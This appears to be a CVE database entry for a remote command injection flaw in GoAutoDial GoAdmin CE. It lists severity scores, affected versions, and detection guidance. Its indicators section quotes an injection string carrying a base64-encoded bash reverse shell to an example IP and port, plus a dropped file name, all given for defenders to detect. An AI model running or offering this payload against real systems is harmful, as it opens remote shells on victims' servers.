cbcvebase.
CVE-2015-2844
published 2015-05-12

CVE-2015-2844: The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1420434000 allows remote attackers to execute arbitrary commands via the $action portion…

PriorityP270critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
12.72%
95.8th percentile
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1420434000 allows remote attackers to execute arbitrary commands via the $action portion of the PATH_INFO.

Affected

2 ranges
VendorProductVersion rangeFixed in
goautodialgoadmin_ce
goautodialgoadmin_ce

Detection & IOCsextracted from sources · hover to see the quote

path/index.php/go_site/cpanel/$type/$action
path/sounds/go_bogus.wav.php
command|| bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode\`"
pathgo_site.php
filenamego_bogus.wav.php
  • Detect command injection attempts in the PATH_INFO of go_site.php targeting the cpanel function; look for shell metacharacters (e.g., '||', ';', '`') in the $action or $type URI segments under /index.php/go_site/cpanel/
  • Alert on HTTP requests to /index.php/go_site/cpanel/ containing base64-encoded payloads or pipe/bash subshell patterns, as attackers use base64 encoding to bypass web server encoding filters
  • Detect the underlying exec call pattern in go_site.php: exec("/usr/share/goautodial/goautodialc.pl '/sbin/service $type ".strtolower($action)."'") — monitor process execution of goautodialc.pl spawning unexpected child processes
  • Flag outbound /dev/tcp reverse shell connections initiated by bash, particularly from web server processes (e.g., apache/php) to external IPs on non-standard ports such as 4444
  • ·Any GoAutoDial version between 3.3-1406088000 and 3.3-1421902800 may be vulnerable, not just the specific build listed in the CVE, as intermediate releases contained no relevant code fixes
  • ·The exploit PoC IP (192.168.0.11) and port (4444) are example attacker-controlled values from the PoC; real-world exploitation will use different callback addresses and ports
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.